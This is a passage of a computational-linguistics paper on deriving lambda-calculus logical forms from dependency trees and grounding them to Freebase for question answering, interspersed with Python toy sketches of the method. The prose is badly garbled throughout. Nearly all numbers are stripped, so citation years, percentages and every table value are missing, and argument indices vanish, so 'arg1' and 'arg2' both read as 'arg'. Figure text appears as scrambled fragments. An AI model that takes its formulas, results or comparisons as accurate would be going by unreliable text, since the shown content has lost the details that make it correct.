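the following toy sketch mimics how lexical entries and dependency-label entries combine: words contribute a unary predicate over the individual or event slot of their variable, labels of the simple form used for nsubj and dobj conjoin head and modifier and relate the head's event to the modifier's individual, and walking the s-expression bottom-up reproduces the logical form for disney acquired pixar given above. predicate lists stand in for lambda terms and beta reduction, arg1 and arg2 stand for the paper's argument relations, and the generated variable names are an invention of the sketch.

```python
import itertools

fresh = itertools.count()
new_var = lambda: f"v{next(fresh)}"

def word(pred, kind):
    """lexical entry: nouns predicate over the individual slot (x_a),
    verbs over the event slot (x_e)."""
    def entry(x):
        slot = f"{x}_a" if kind == "noun" else f"{x}_e"
        return [f"{pred}({slot})"]
    return entry

def label(rel):
    """dependency-label entry of the 'mirroring' form:
    lambda f g z. exists x. f(z) & g(x) & rel(z_e, x_a)"""
    def entry(f, g):
        def combined(z):
            parts = f(z)
            x = new_var()
            return parts + g(x) + [f"{rel}({z}_e, {x}_a)"]
        return combined
    return entry

lexicon = {"acquired": word("acquired", "verb"),
           "disney": word("disney", "noun"),
           "pixar": word("pixar", "noun")}
labels = {"nsubj": label("arg1"), "dobj": label("arg2")}

def compose(sexp):
    """compose an s-expression such as (nsubj (dobj acquired pixar) disney)."""
    if isinstance(sexp, str):
        return lexicon[sexp]
    rel, head, mod = sexp
    return labels[rel](compose(head), compose(mod))

sexp = ("nsubj", ("dobj", "acquired", "pixar"), "disney")
root = new_var()
print(f"lambda {root}. " + " & ".join(compose(sexp)(root)))
# -> lambda v0. acquired(v0_e) & pixar(v1_a) & arg2(v0_e, v1_a)
#    & disney(v2_a) & arg1(v0_e, v2_a)
```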
for example, disney acquired pixar has the s-expression (nsubj (dobj acquired pixar) disney) formally, an s-expression has the form (exp exp exp ), where exp is a dependency label, and both exp and exp are either ( ) a word such as acquired ; or ( ) an s-expression such as (dobj acquired pixar). we refer to the process of mapping a dependency tree to an s-expression as binarization, as it involves an ordering of modifiers to a particular head, similar to binarization of a context-free parse tree. substitution. each symbol (word or label) in the s-expression is assigned a lambda expression. in our running example we have the following assignments: acquired ⇒ λx. acquired(xe) disney ⇒ λy. disney(ya) pixar ⇒ λz. pixar(za) nsubj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ arg (ze,xa) dobj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ arg (ze,xa) composition. beta-reduction is used to compose the lambda-expression terms to compute the final semantics for the input sentence. in this step expres- sions of the form (exp exp exp ) are interpreted as function exp being applied to arguments exp and exp . for example, (dobj acquired pixar) re- ceives the following expression after composition: λz.∃x. acquired(ze) ∧ pixar(xa) ∧ arg (ze,xa) obliqueness hierarchy. the binarization stage re- quires a strict ordering on the different modifiers to each head in a dependency parse. for example, in (nsubj (dobj acquired pixar) disney), the dobj is attached before the nsubj. the ordering is very similar to the obliqueness hierarchy in syntactic for- malisms such as hpsg (pollard and sag, ). type for dependency labels. recall from sec- tion that every s-expression subtree receive a log- ical form of type η = ind × event → bool. it follows that in any s-expression (exp exp exp ), exp has type η → (η → η), exp and exp both have type η, and the full expression has type η. since each labeled dependency relation (e.g., nsubj, dobj, partmod) is associated with exp in connecting two s-expression subtrees, dependency labels always re- ceive expressions of type η → (η → η). mirroring dependency structure. whenever a dependency label receives an expression of the form λfgz.∃x.f(z) ∧g(x) ∧ rel(ze,xa) ( ) where rel is a logical relation, the composition op- eration builds a structure that essentially mirrors the original dependency structure. for example nsubj and dobj receive expressions of this form, with rel = arg and rel = arg , respectively; the final lambda expression for disney acquired pixar is λx.∃yz. acquired(xe) ∧ disney(ya) ∧pixar(za) ∧ arg (xe,ya) ∧ arg (xe,za) this structure is isomorphic to the original depen- dency structure: there are variables xe, ya and za corresponding to acquired, disney and pixar, respectively; and the sub-expressions arg (xe,ya) and arg (xe,za) correspond to the dependencies ac- quired → disney and acquired → pixar. by default we assume that the predicate argument structure is isomorphic to the dependency structure and many dependency labels receive a semantics of the form shown in ( ). however, there are a num- ber of important exceptions. as one example, the dependency label partmod receives semantics λfgz.∃x.f(z) ∧g(x) ∧ arg (xe,za) with arg (xe,za) in place of the arg (ze,xa) in ( ). this reverses the dependency direction to capture the predicate-argument structure of reduced relative constructions such as a company acquired by disney. post-processing. we apply three post-processing steps—simple inferences over lambda-calculus expressions—to the derived logical forms. 
these relate to the handling of prepositions, coordination and control and are described and motivated in more detail under the respective headings below. . analysis of some linguistic constructions in this section we describe in detail how various lin- guistic constructions not covered by the rule in ( )— prepositional phrases, conjunction, relative clauses, and wh questions—are handled in the formalism. prepositional phrases. prepositional phrase mod- ifiers to nouns and verbs have similar s-expressions: (prep president (pobj in )) (prep acquired (pobj in )) the following entries are used in these examples: in ⇒ λx. in(xe) prep ⇒ λfgz.∃x.f(z) ∧g(x) ∧ prep(ze,xa) pobj ⇒ λfgz.∃x.f(z) ∧g(x) ∧ pobj(ze,xa) president ⇒ λx. president(xa) ∧president event(xe) ∧ arg (xe,xa) acquired ⇒ λx. acquired(xe) where the entries for prep and pobj simply mirror the original dependency structure with prep modifying the event variable ze. the semantics for acquired in is as follows: λx.∃py. acquired(xe) ∧ (ya) ∧ in(pe) ∧ prep(xe,pe) ∧ pobj(pe,ya) the system contains binarization rules (e.g., rules for obliqueness hierarchy and identifying traces) and substi- tution rules (i.e., rules for dependency labels and parts of speech). the rules can be found at http://github.com/ sivareddyg/deplambda. we replace in(pe) ∧ prep(xe,pe) ∧ pobj(pe,ya) by prep.in(xe,ya) as a post-processing step, effectively collapsing out the p variable while replacing the prep and pobj dependencies by a single dependency, prep.in. the final semantics are then as follows: λx.∃y. acquired(xe) ∧ (ya) ∧ prep.in(xe,ya) in practice this step is easily achieved by identifying variables (in this case pe) participating in prep and pobj relations. it would be tempting to achieve this step within the lambda calculus expressions them- selves, but we have found the post-processing step to be more robust to parsing errors and corner cases in the usage of the prep and pobj dependency labels. conjunctions. first consider a simple case of np- conjunction, bill and dave founded hp, whose s-expression is as follows: (nsubj (dobj founded hp) (conj-np (cc bill and) dave)) we make use of the following entries: conj-np ⇒ λfgx.∃yz.f(y) ∧g(z) ∧ coord(x,y,z) cc ⇒ λfgz.f(z) the sentence bill and dave founded hp then re- ceives the following semantics: λe.∃xyzu. bill(ya) ∧ dave(za) ∧ founded(ee) ∧ hp(ua) ∧coord(x,y,z) ∧ arg (ee,xa) ∧ arg (ee,ua) note how the x variable occurs in two sub- expressions: coord(x,y,z), and arg (ee,xa). it can be interpreted as a variable that conjoins variables y and z together. in particular, we introduce a post-processing step where the sub- expression coord(x,y,z) ∧ arg (ee,xa) is replaced with arg (ee,ya) ∧ arg (ee,za), and the x variable is removed. the resulting expression is as follows: λe.∃yzu. bill(ya) ∧ dave(za) ∧ founded(ee) ∧ hp(ua) ∧arg (ee,ya) ∧ arg (ee,za) ∧ arg (ee,ua) vp-coordination is treated in a very similar way. consider the sentence eminem signed to interscope and discovered cent. this has the following s-expression: (nsubj (conj-vp (cc s-to-i and) d- ) eminem) where s-to-i refers to the vp signed to interscope, and d- refers to the vp discovered cent. the lambda-calculus expression for conj-vp is identical to the expression for conj-np: http://github.com/sivareddyg/deplambda http://github.com/sivareddyg/deplambda conj-vp ⇒ λfgx.∃yz.f(y) ∧g(z) ∧ coord(x,y,z) the logical form for the full sentence is then λe.∃xyz. 
eminem(xa) ∧ coord(e,y,z) ∧arg (ee,xa) ∧ s to i(y) ∧ d (z) where we use s to i(y) and d (z) as shorthand for the lambda-calculus expressions for the two vps. after post-processing this is simplified to λe.∃xyz. eminem(xa) ∧ arg (ye,xa) ∧arg (ze,xa) ∧ s to i(y) ∧ d (z) other types of coordination, such as sentence- level coordination and pp coordination, are handled with the same mechanism. all coordination depen- dency labels have the same semantics as conj-np and conj-vp. the only reason for having distinct de- pendency labels for different types of coordination is that different labels appear in different positions in the obliqueness hierarchy. this is important for getting the correct scope for different forms of con- junction. for instance, the following s-expression for the eminem example would lead to an incorrect semantics: (conj-vp (nsubj (cc s-to-i and) eminem) d- ) this s-expression is not possible under the oblique- ness hierarchy, which places nsubj modifiers to a verb after conj-vp modifiers. we realize that this treatment of conjunction is quite naive in comparison to that on offer in ccg. however, given the crude analysis of conjunction in dependency syntax, a more refined treatment is beyond the scope of the current approach. relative clauses. our treatment of relative clauses is closely related to the mechanism for traces de- scribed by moortgat ( ; ); see also carpenter ( ) and pereira ( ). consider the np apple which jobs founded with s-expression: (rcmod apple (wh-dobj (bind f (nsubj (dobj founded f) jobs)) which)) note that the s-expression has been augmented to include a variable f in dobj position, with (bind f ...) binding this variable at the clause level. these annotations are added using a set of heuristic rules over the original dependency parse tree. the bind operation is interpreted in the following way. if we have an expression of the form (bind f λx.g(x)) where f is a variable and g is an expression that includes f, this is converted to λz.∃x.g(x) |f=eq(z) where g(x) |f=eq(z) is the expression g(x) with the expression eq(z) substituted for f. eq(z)(z′) is true iff z and z′ are equal (refer to the same entity). in addition we assume the following entries: wh-dobj ⇒ λfgz.f(z) rcmod ⇒ λfgz.f(z) ∧g(z) it can be verified that (bind f (nsubj (dobj founded f) jobs)) has semantics λu.∃xyz. founded(xe) ∧ jobs(ya) ∧ eq(u)(z) ∧arg (xe,ya) ∧ arg (xe,za) and apple which jobs founded has semantics λu.∃xyz. founded(xe) ∧ jobs(ya) ∧ eq(u)(z) ∧arg (xe,ya) ∧ arg (xe,za) ∧ apple(ua) as intended. note that this latter expression can be simplified, by elimination of the z variable, to λu.∃xy. founded(xe) ∧ jobs(ya) ∧arg (xe,ya) ∧ arg (xe,ua) ∧ apple(ua) wh questions. wh questions are handled using the bind-mechanism described in the previous sec- tion. as one example, the s-expression for who did jim marry is as follows: (wh-dobj (bind f (nsubj (aux (dobj marry f) did) jim)) who) we assume the following lambda expressions: who ⇒ λx. target(xa) did ⇒ λx. true aux ⇒ λfg.f wh-dobj ⇒ λfgx.f(x) ∧g(x) it can be verified that this gives the final logical form λx.∃yz. target(xa) ∧ marry(ye) ∧ jim(za) ∧arg (ye,za) ∧ arg (ye,xa) note that the predicate target is applied to the variable that is the focus of the question. a similar treatment is used for cases with the wh-element in subject position (e.g., who married jim ) or where the wh-element is extracted from a prepositional phrase (e.g., who was jim married to ). . 
comparison to ccg in this section we discuss some differences between our approach and ccg-based approaches for map- ping sentences to logical forms. although our focus is on ccg, the arguments are similar for other for- malisms that use the lambda calculus in conjunction with a generative grammar, such as hpsg and lfg, or approaches based on context-free grammars. our approach differs in two important (and re- lated) respects from ccg: ( ) all constituents in our approach have the same semantic type (ind × event → bool); ( ) our formalism does not make the argument/adjunct distinction, instead essentially treating all modifiers to a given head as adjuncts. as an example, consider the analysis of disney acquired pixar within ccg. in this case acquired would be assigned the following ccg lexical entry: s\np/np ⇒ λf f x.∃yz. acquired(x) ∧f (y) ∧f (z) ∧arg (x,y) ∧ arg (x,z) note the explicit arguments corresponding to the subject and object of this transitive verb (f and f , respectively). an intransitive verb such as sleeps would be assigned an entry with a single functional argument corresponding to the subject (f ): s\np ⇒ λf x.∃y. sleeps(x) ∧f (y) ∧ arg (x,y) in contrast, the entries in our system for these two verbs are simply λx. acquired(xe) and λx. sleeps(xe). the two forms are similar, have the same semantic type, and do not include variables such as f and f for the subject and object. the advantage of our approach is that it is ro- bust, and relatively simple, in that a strict gram- mar that enforces type checking is not required. however, there are challenges in handling some lin- guistic constructions. a simple example is passive verbs. in our formalism, the passive form of ac- quired has the form λx. acquired.pass(xe), distinct from its active form λx. acquired(xe). the sen- tence pixar was acquired is then assigned the log- ical form λx.∃y. acquired.pass(xe) ∧ pixar(ya) ∧ arg (xe,ya). modifying our approach to give the same logical forms for active and passive forms would require a significant extension of our approach. in contrast, in ccg the lexical entry for the passive form of acquired can directly specify the mapping between subject position and the arg : s\np ⇒ λf x.∃z. acquired(x) ∧f (z) ∧ arg (x,z) as another example, correct handling of object and subject control verbs is challenging in the single- type system: for example, in the analysis for john persuaded jim to acquire apple, the ccg analysis would have an entry for persuaded that explicitly takes three arguments (in this case john, jim, and to acquire apple ) and assigns jim as both the direct object of persuaded and as the subject of acquire. in our approach the subject relationship to acquire is instead recovered in a post-processing step, based on the lexical identity of persuaded. semantic parsing as graph matching we next describe how the ungrounded logical forms from the previous section are mapped to a fully grounded semantic representation that can be used for question answering against freebase. follow- ing reddy et al. ( ), we treat this mapping as a graph matching problem, but instead of deriving un- grounded graphs from ccg-based logical forms, we use the dependency-based logical forms from the pre- vious sections. to learn the mapping to freebase, we rely on manually assembled question-answer pairs. for each training question, we first find the set of oracle grounded graphs—freebase subgraphs which when executed yield the correct answer—derivable from the question logical form. 
these oracle graphs are then used to train a structured perceptron model. . ungrounded graphs we follow reddy et al. ( ) and first convert logi- cal forms to their corresponding ungrounded graphs. figure (a) shows an example for what is the name of the company which disney acquired in ?. predi- cates corresponding to resolved entities (disney(ya) and (va)) become entity nodes (rectangles), whereas remaining entity predicates (name(wa) and company(xa)) become entity nodes (wa and xa), connected to entity type nodes (name and company; rounded rectangles). the target(wa) node (dia- mond) connects to the entity node whose denotation corresponds to the answer to the question. . grounded graphs the ungrounded graphs are grounded to freebase subgraphs by mapping entity nodes, entity-entity name target company wa we xa ze disney ze ze ac qu ire d. ar g ac qu ire d. ar g a c q u ire d .p re p .in a c q u ire d .a rg acquired.arg acquired.prep.in name.arg name.prep.of ty p e ty p e contract (a) before contract. target organization. organization company name xa ze disney ze ze ac qu ire d. ar g ac qu ire d. ar g bu sin es s. ac qu ist ion . ac qu iri ng co m pa ny bu sin ess .ac qu ist ion . co mp an y a cq uir ed a c q u ire d .p re p .in a c q u ire d .a rg b u sin e ss. a c q u isitio n . d a te b u sin e ss. a c q u istio n . c o m p a n y a c q u ire d acquired.arg acquired.prep.in business. acquistion. acquiring com pany business. acquisition. date type ty p e (b) after contract. figure : the contract operation applied to the un- grounded graph for the question what is the name of the company which disney acquired in ?. after con- tract has been applied the graph is isomorphic to the representation in freebase; in (b) we show the freebase predicates after grounding in blue. edges and entity type nodes in the ungrounded graph to freebase entities, relations and types, respec- tively. while reddy et al. ( ) assume that the un- grounded graphs are isomorphic to their correspond- ing freebase subgraph, at least % of the examples in our development set do not satisfy this property. for example, the ungrounded graph in figure (a) is not isomorphic to the freebase subgraph in fig- ure (b), making it impossible to derive the correct grounded graph from the ungrounded one by a direct mapping. to account for such structural mismatch, we introduce two simple transformation operations. contract. the contract operation takes a pair of entity nodes connected by an edge and merges them into a single node. for example, in figure (a) the entity nodes wa and xa are connected by an edge via the event we. after applying the contract op- eration to nodes wa and xa, they are merged. note how in figure (b) all the nodes attached to wa attach to the node xa after this operation. the contracted graph is now isomorphic to its freebase subgraph. expand. parse errors may lead to ungrounded graphs with disconnected components. for example, the ungrammatical question what to do washington dc december? results in the lambda expression λz.∃xyw. target(xa) ∧ do(ze) ∧ arg (ze,xa) ∧ washington dc(ya) ∧ december(wa). the corre- sponding ungrounded graph has three disconnected components (december and washington dc, and the component with entity node xa linked to event ze). in such cases, the graph is expanded by link- ing disconnected entity nodes to the event node with the largest edge degree. 
in the example above, this would add edges corresponding to the predicates dep(ze,ya) ∧ dep(ze,wa), where dep is the predi- cate introduced by the expand operation when link- ing ya and wa to ze. when there is no existing event node in the graph, a dummy event node is introduced. . learning we use a linear model to map ungrounded to grounded graphs. the parameters of the model are learned from question-answer pairs. for example, the question what is the name of the company which disney acquired in ? is paired with its answer {pixar}. in line with most work on question answer- ing against freebase, we do not rely on annotated log- ical forms associated with the question for training, instead treating grounded graphs as latent variables. let q be a question, let u be an ungrounded graph for q and let g be a grounded graph formed by ground- ing the nodes and edges of u to the knowledge base k (throughout we use freebase as the knowledge base). following reddy et al. ( ), we use beam search to find the highest scoring pair of ungrounded and grounded graphs (û, ĝ) under the model θ ∈ . for training. experimental setup we next verify empirically that our proposed ap- proach derives a useful logical compositional seman- tic representation from dependency syntax. below, we give details on the evaluation datasets and base- lines used for comparison. we also describe the model features and provide implementation details. . training and evaluation datasets we evaluated our approach on the free (cai and yates, ) and webquestions (berant et al., ) datasets. free consists of questions manually annotated with their freebase query. we retrieved the answer to each question by executing its query on freebase and ignore the query for all subsequent ex- periments. webquestions consists of question- answer pairs. the standard train/test splits were used for both datasets, with free containing train and test questions and webquestions contain- ing train and test questions. for all our development experiments we tuned the models on held-out data consisting of % of the training ques- tions, while for final testing we used the complete training data. . baseline models and representations in addition to the dependency-based semantic rep- resentation deplambda (section ) and previous work on these datasets, we compare to three addi- tional baseline representations outlined below. we use graphparser to map these representations to freebase. deptree. in this baseline, an ungrounded graph is created directly from the original dependency tree. an event is created for each parent and its dependents in the tree. each dependent is linked to this event with an edge labeled with its dependency relation, while the parent is linked to the event with an edge labeled arg . if a word is a question word, an additional target predicate is attached to its entity node. simplegraph. this representation has a single event to which all entities in the question are con- nected by the predicate arg . an additional target node is connected to the event by the predicate arg . this is similar to the template representation of yao ( ) and bast and haussmann ( ). note that this cannot represent any compositional structure. ccggraph. finally, we compare to the ccg- based semantic representation of reddy et al. ( ), adding the contract and expand operations to increase its expressivity. . 
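the grounding model described in this part of the paper, a linear model over alignments between ungrounded edges and freebase relations trained as a structured perceptron with beam search over candidate groundings, can be sketched as follows. the candidate relations, the indicator feature template and the single training example are invented for illustration, and the contract and expand operations are left out to keep the sketch short.

```python
from collections import defaultdict

# toy inventory of freebase-style relations each ungrounded edge may map to
CANDIDATES = {"acquired.arg2": ["skip", "business.acquisition.company_acquired"],
              "acquired.prep.in": ["skip", "business.acquisition.date"]}

def features(edge, grounding):
    """simple indicator features pairing an ungrounded edge with its grounding."""
    return {f"{edge}->{grounding}": 1.0}

def score(theta, assignment):
    return sum(theta[f] * v for e, g in assignment.items()
               for f, v in features(e, g).items())

def beam_search(theta, edges, beam_size=4):
    """ground one edge at a time, keeping the top partial assignments."""
    beam = [dict()]
    for e in edges:
        expanded = [dict(a, **{e: g}) for a in beam for g in CANDIDATES[e]]
        expanded.sort(key=lambda a: score(theta, a), reverse=True)
        beam = expanded[:beam_size]
    return beam[0]

def perceptron_update(theta, predicted, oracle, lr=1.0):
    """structured perceptron: promote oracle features, demote predicted ones."""
    for e, g in oracle.items():
        for f, v in features(e, g).items():
            theta[f] += lr * v
    for e, g in predicted.items():
        for f, v in features(e, g).items():
            theta[f] -= lr * v

theta = defaultdict(float)
edges = list(CANDIDATES)
oracle = {"acquired.arg2": "business.acquisition.company_acquired",
          "acquired.prep.in": "business.acquisition.date"}
for _ in range(3):                           # a few training passes on one example
    predicted = beam_search(theta, edges)
    if predicted != oracle:
        perceptron_update(theta, predicted, oracle)
print(beam_search(theta, edges) == oracle)   # True once the weights separate the graphs
```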
implementation details below are more details of our entity resolution model, the syntactic parser used, features in the grounding model and the beam search procedure. entity resolution. for free , we follow prior work and resolve entities by string match against the entity lexicon provided with the dataset. for web- questions, we use eight handcrafted part-of-speech patterns to identify entity span candidates. we use the stanford corenlp caseless tagger for part-of-speech tagging (manning et al., ). for each candidate mention span, we retrieve the top entities accord- ing to the freebase api. we then create a lattice in which the nodes correspond to mention-entity pairs, scored by their freebase api scores, and the edges encode the fact that no joint assignment of entities to mentions can contain overlapping spans. finally, we generate ungrounded graphs for the top paths through the lattice and treat the final entity disam- biguation as part of the semantic parsing problem. http://github.com/sivareddyg/graph-parser http://developers.google.com/freebase/ http://github.com/sivareddyg/graph-parser http://developers.google.com/freebase/ representation -c -e -c +e +c -e +c +e (a) average oracle f deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (b) average number of oracle graphs per question deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (c) average f deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . table : oracle statistics and accuracies on the web- questions development set. +(-)c: with(out) contract. +(-)e: with(out) expand. syntactic parsing. we recase the resolved entity mentions and run a case-sensitive second-order con- ditional random field part-of-speech tagger (laf- ferty et al., ). the hypergraph parser of zhang and mcdonald ( ) is used for dependency pars- ing. the tagger and parser are both trained on the ontonotes . corpus (weischedel et al., ), with constituency trees converted to stanford-style depen- dencies (de marneffe and manning, ). to derive the ccg-based representation, we use the output of the easyccg parser (lewis and steedman, ). features. we use the features from reddy et al. ( ), which include edge alignment and stem over- lap between ungrounded and grounded graphs, and contextual features such as word and grounded rela- tion pairs. in addition, we introduce a feature indi- cating the use of the contract operation: (merged- subedge, headsubedge, mergedisentity, headisen- tity). for example, in figure the edge between wa and xa is contracted to xa, resulting in the feature (name.arg , name.prep.of, false, false). the ex- pand operation is treated as a pre-processing step and no features are used to encode its use. finally, the entity-lattice score is used as a real valued feature. beam search. we use beam search to infer the highest scoring graph pair for a question. the search operates over entity-entity edges and entity type nodes of each ungrounded graph. for an entity-entity representation -c -e -c +e +c -e +c +e (a) oracle accuracy deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (b) average number of oracle graphs per question deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . (c) accuracy deptree . . . . simplegraph . . . . ccggraph . . . . deplambda . . . . table : oracle statistics and accuracies on the free development set. +(-)c: with(out) contract. +(-)e: with(out) expand. 
edge, we can ground the edge to a freebase relation, contract the edge in either direction, or skip the edge. for an entity type node, we can ground the node to a freebase type, or skip the node. the order of traversal is based on the number of named entities connected to an edge. after an edge is grounded, the entity type nodes connected to it are grounded in turn, before the next edge is processed. to restrict the search, if two beam items correspond to the same grounded graph, the one with the lower score is discarded. a beam size of was used in all experiments. experimental results we examine the different representations for ques- tion answering along two axes. first, we compare their expressiveness in terms of answer reachability assuming a perfect model. second, we compare their performance with a learned model. finally, we con- duct a detailed error analysis of deplambda, with a comparison to the errors made by ccggraph. for webquestions evaluation is in terms of the av- erage f -score across questions, while for free , evaluation is in terms of exact answer accuracy. . expressiveness of the representations table (a) and table (a) show the oracle f -scores of each representation on the webquestions and we use the evaluation scripts available at http:// www-nlp.stanford.edu/software/sempre and http:// github.com/elmar-haussmann/aqqu, respectively. http://www-nlp.stanford.edu/software/sempre http://www-nlp.stanford.edu/software/sempre http://github.com/elmar-haussmann/aqqu http://github.com/elmar-haussmann/aqqu free development sets respectively. according to the first column (-c -e), the original deptree repre- sentation can be directly mapped to freebase for less than a third of the questions. adding the contract operation (+c) improves this substantially to an ora- cle f of about % on webquestions and . % on free . however, this comes at the cost of massive spurious ambiguity: from table (b) there are on av- erage over oracle graphs for a single dependency tree. table (c) shows the results of the different representations on the webquestions development set. spurious ambiguity clearly hampers learning and deptree falls behind the other representations. ccggraph and deplambda align much more closely to freebase and achieve similar oracle f scores with far less spurious ambiguity. simple- graph, which cannot represent any compositional semantics, is competitive with these syntax-based representations. this might come as a surprise, but it simply reflects the fact that the dataset does not con- tain questions that require compositional reasoning. . results on webquestions and free we use the best settings on the development set in subsequent experiments, i.e., with contract and expand enabled. table shows the results on the webquestions and free test sets with additional entries for recent prior work on these datasets. the trend from the development set carries over and de- plambda outperforms the other graph-based repre- sentations, while performing slightly below the state- of-the-art model of yih et al. ( ) (“y&c”), which uses a separately trained entity resolution system (yang and chang, ). when using the standard freebase api (“fb api”) for entity resolution, the performance of their model drops to . % f . on free , deplambda outperforms all other representations by a wide margin and obtains the best result to date. interestingly, deptree outperforms simplegraph in this case. we attribute this to the small training set and larger lexical variation of free . 
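the beam-search grounding procedure described above (ground each entity-entity edge to a relation, contract it in either direction, or skip it; then ground or skip its type nodes; deduplicate items that denote the same grounded graph) can be sketched as follows. the candidate generators, the scoring callable, the beam size, and the toy relation name are placeholders standing in for the learned model and the freebase lookups.

```python
def beam_ground(edges, type_nodes, rels_for, types_for, score, beam_size=100):
    """Ground an ungrounded graph edge by edge with beam search.
    `edges` is assumed pre-ordered by the number of named entities attached."""
    beam = [((), 0.0)]                                   # (partial derivation, model score)
    for edge in edges:
        actions = ([("ground", edge, r) for r in rels_for(edge)]
                   + [("contract", edge, "left"), ("contract", edge, "right"),
                      ("skip", edge, None)])
        expanded = [(g + (a,), s + score(g + (a,))) for g, s in beam for a in actions]
        for node in type_nodes.get(edge, []):            # type nodes grounded right after their edge
            node_actions = [("type", node, t) for t in types_for(node)] + [("type", node, None)]
            expanded = [(g + (a,), s + score(g + (a,)))
                        for g, s in expanded for a in node_actions]
        dedup = {}                                       # identical partial derivations (a stand-in for
        for g, s in expanded:                            # comparing the induced grounded graph) keep
            if g not in dedup or s > dedup[g]:           # only the higher-scoring item
                dedup[g] = s
        beam = sorted(dedup.items(), key=lambda kv: -kv[1])[:beam_size]
    return beam

# usage with toy candidate generators and a trivial scorer (relation name is made up)
print(beam_ground([("disney", "target")], {}, lambda e: ["rel.acquired_by"],
                  lambda n: [], score=lambda g: 0.0, beam_size=5))
```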
the structural features of the graph-based representations seem highly beneficial in this case. . error analysis we categorized errors made by deplambda (+c +e) on the webquestions development set. in cases the correct answer is present in the beam, free webquestions method accuracy average f cai and yates ( ) . – berant et al. ( ) . . kwiatkowski et al. ( ) . – yao and van durme ( ) – . berant and liang ( ) . . bao et al. ( ) – . bordes et al. ( ) – . yao ( ) – . yih et al. ( ) (fb api) – . bast and haussmann ( ) . . berant and liang ( ) – . yih et al. ( ) (y&c) – . this work deptree . . simplegraph . . ccggraph (+c +e) . . deplambda (+c +e) . . table : question-answering results on the webquestions and free test sets. but ranked below an incorrect answer (e.g., for where does volga river start, the annotated gold answer is valdai hills, which is ranked second, with russia, europe ranked first). in cases, only a subset of the answer is predicted correctly (e.g, for what coun- tries in the world speak german, the system predicts germany from the human language.main country freebase relation, whereas the gold relation human language.countries spoken in gives multi- ple countries). together, these two categories corre- spond to roughly % of the errors. in cases, the freebase api fails to add the gold entity to the lattice (e.g., for who is blackwell, the correct blackwell en- tity was missing). due to the way webquestions was crowdsourced, questions have incorrect or incom- plete gold annotations (e.g., what does each fold of us flag means is answered with usa). the remaining cases are due to structural mismatch (e.g., in who is the new governor of florida , the graph failed to connect the target node with both and florida ). due to the ungrammatical nature of webquestions, ccggraph fails to produce ungrounded graphs for . % of the complete development set, while de- plambda is more robust with only . % such errors. the ccg parser is restricted to produce a sentence tag as the final category in the syntactic derivation, which penalizes ungrammatical analyses (e.g., what victoria beckham kids names and what nestle owns ). examples where deplambda fails due to parse er- rors, but ccggraph succeed include when was blessed kateri born and where did anne frank live before the war. note that the expand operation mit- igates some of these problems. while ccg is known for handling comparatives elegantly (e.g., who was sworn into office when john f kennedy was assassi- nated ), we do not have a special treatment for them in the semantic representation. differences in syn- tactic parsing performance and the somewhat limited expressivity of the semantic representation are likely the reasons for ccggraph’s lower performance. related work there are two relevant strands of prior work: gen- eral purpose ungrounded semantics and grounded semantic parsing. the former have been studied on their own and as a component in tasks such as seman- tic parsing to knowledge bases (kwiatkowski et al., ; reddy et al., ; choi et al., ; krishna- murthy and mitchell, ), sentence simplification (narayan and gardent, ), summarization (liu et al., ), paraphrasing (pavlick et al., ) and relation extraction (rocktäschel et al., ). there are two ways of generating these representations: ei- ther relying on syntactic structure and producing the semantics post hoc, or generating it directly from text. 
we adopt the former approach, which was pioneered by montague ( ) and is becoming increasingly at- tractive with the advent of accurate syntactic parsers. there have been extensive studies on extracting semantics from syntactic representations such as lfg (dalrymple et al., ), hpsg (copestake et al., ; copestake et al., ), tag (gar- dent and kallmeyer, ; joshi et al., ) and ccg (baldridge and kruijff, ; bos et al., ; steedman, ; artzi et al., ). however, few have used dependency structures for this purpose. debusmann et al. ( ) and cimiano ( ) de- scribe grammar-based conversions of dependencies to semantic representations, but do not validate them empirically. stanovsky et al. ( ) use heuristics based on linguistic grounds to convert dependen- cies to proposition structures. bédaride and gar- dent ( ) propose a graph-rewriting technique to convert a graph built from dependency trees and se- mantic role structures to a first-order logical form, and present results on textual entailment. our work, in contrast, assumes access only to dependency trees and offers an alternative method based on the lambda calculus, mimicking the structure of knowledge bases such as freebase; we further present extensive empir- ical results on recent question-answering corpora. structural mismatch between the source semantic representation and the target application’s represen- tation is an inherent problem with approaches using general-purpose representations. kwiatkowski et al. ( ) propose lambda-calculus operations to gen- erate multiple type-equivalent expressions to handle this mismatch. in contrast, we use graph-transduction operations which are relatively easier to interpret. there is also growing work on converting syntactic structures to the target application’s structure without going through an intermediate semantic representa- tion, e.g., answer-sentence selection (punyakanok et al., ; heilman and smith, ; yao et al., ) and semantic parsing (ge and mooney, ; poon, ; parikh et al., ; xu et al., ; wang et al., ; andreas and klein, ). a different paradigm is to directly parse the text into a grounded semantic representation. typically, an over-generating grammar is used whose accepted parses are ranked (zelle and mooney, ; zettle- moyer and collins, ; wong and mooney, ; kwiatkowksi et al., ; liang et al., ; berant et al., ; flanigan et al., ; groschwitz et al., ). in contrast, bordes et al. ( ) and dong et al. ( ) discard the notion of a target represen- tation altogether and instead learn to rank potential answers to a given question by embedding questions and answers into the same vector space. conclusion we have introduced a method for converting depen- dency structures to logical forms using the lambda calculus. a key idea of this work is the use of a single semantic type for every constituent of the dependency tree, which provides us with a robust way of com- positionally deriving logical forms. the resulting representation is subsequently grounded to freebase by learning from question-answer pairs. empirically, the proposed representation was shown to be superior to the original dependency trees and more robust than logical forms derived from a ccg parser. acknowledgements this work greatly benefitted from discussions with slav petrov, john blitzer, fernando pereira, emily pitler and nathan schneider. the authors would also like to thank christopher potts and the three anony- mous reviewers for their valuable feedback. 
